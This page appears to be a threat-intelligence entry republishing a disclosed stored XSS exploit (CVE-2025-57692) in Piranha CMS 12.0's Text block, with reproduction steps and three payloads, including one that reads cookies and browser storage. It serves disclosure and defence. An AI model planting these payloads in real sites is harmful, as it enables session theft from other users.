Piranha CMS 12.0 - Stored XSS in Text Block
Piranha CMS 12.0 - Stored XSS in Text Block
AI Analysis
Technical Summary
The vulnerability in Piranha CMS 12.0 is a stored XSS issue within the Text Block feature. Stored XSS occurs when malicious script code is saved on the server and later rendered in users' browsers, potentially leading to session hijacking, defacement, or other script-based attacks. The available exploit demonstrates how this vulnerability can be triggered. No affected versions beyond 12.0 are specified, and no vendor advisory or patch information is currently available.
Potential Impact
Successful exploitation could allow attackers to execute arbitrary JavaScript in the context of users viewing the compromised Text Block content. This can lead to theft of user credentials, session tokens, or other sensitive information accessible via the browser. However, no evidence of active exploitation has been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should consider applying input validation or output encoding workarounds if possible, or restrict access to content editing features to trusted users only.
Indicators of Compromise
- exploit-code: # Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting # Date: 2025-09-26 # Exploit Author: Chidubem Chukwu (Terminal Venom) # LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9? # Vendor Homepage: https://piranhacms.org # Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0 # Version: 12.0 # Category: Web Application # Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome # CVE: CVE-2025-57692 # Privilege Level: authenticated user # Patched Version: Not available # Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md ## Reproduction Steps ## PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user s browser. Reproduction steps 1. Log in to the Piranha admin panel at https://<host>/manager/login. 2. Navigate to Pages. 3. Click Add Page and choose Standard Page or Standard Archive. 4. Enter a page title (e.g., XSS-Test). 5. Click the [ + ] button and select Text under Content to add a Text block. 6. In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page. Payload A <img src="x" onerror=" alert( 'Cookies: ' + document.cookie + '\n' + 'LocalStorage: ' + JSON.stringify(localStorage) + '\n' + 'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' + 'URL: ' + window.location.href + '\n' + 'User Agent: ' + navigator.userAgent + '\n' + 'Time: ' + new Date().toLocaleString() ) " /> Payload B — iframe base64 <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> Payload C — details toggle (on-toggle alert) <details open ontoggle=alert('XSS')>Click</details> 7. Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others). 8. Anyone who accesses the page (or pastes the payload) will trigger the XSS.
Piranha CMS 12.0 - Stored XSS in Text Block
Description
Piranha CMS 12.0 - Stored XSS in Text Block
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The vulnerability in Piranha CMS 12.0 is a stored XSS issue within the Text Block feature. Stored XSS occurs when malicious script code is saved on the server and later rendered in users' browsers, potentially leading to session hijacking, defacement, or other script-based attacks. The available exploit demonstrates how this vulnerability can be triggered. No affected versions beyond 12.0 are specified, and no vendor advisory or patch information is currently available.
Potential Impact
Successful exploitation could allow attackers to execute arbitrary JavaScript in the context of users viewing the compromised Text Block content. This can lead to theft of user credentials, session tokens, or other sensitive information accessible via the browser. However, no evidence of active exploitation has been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should consider applying input validation or output encoding workarounds if possible, or restrict access to content editing features to trusted users only.
Technical Details
- Edb Id
- 52471
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for Piranha CMS 12.0 - Stored XSS in Text Block
# Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting # Date: 2025-09-26 # Exploit Author: Chidubem Chukwu (Terminal Venom) # LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9? # Vendor Homepage: https://piranhacms.org # Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0 # Version: 12.0 # Category: Web Application # Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome # CVE: CVE-2025-57692 # Privilege Level: authenticated user # Patched... (1671 more characters)
Threat ID: 6981b62cf9fa50a62fb223fb
Added to database: 2/3/2026, 8:47:40 AM
Last enriched: 4/7/2026, 11:05:15 AM
Last updated: 5/8/2026, 11:36:20 PM
Views: 217
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.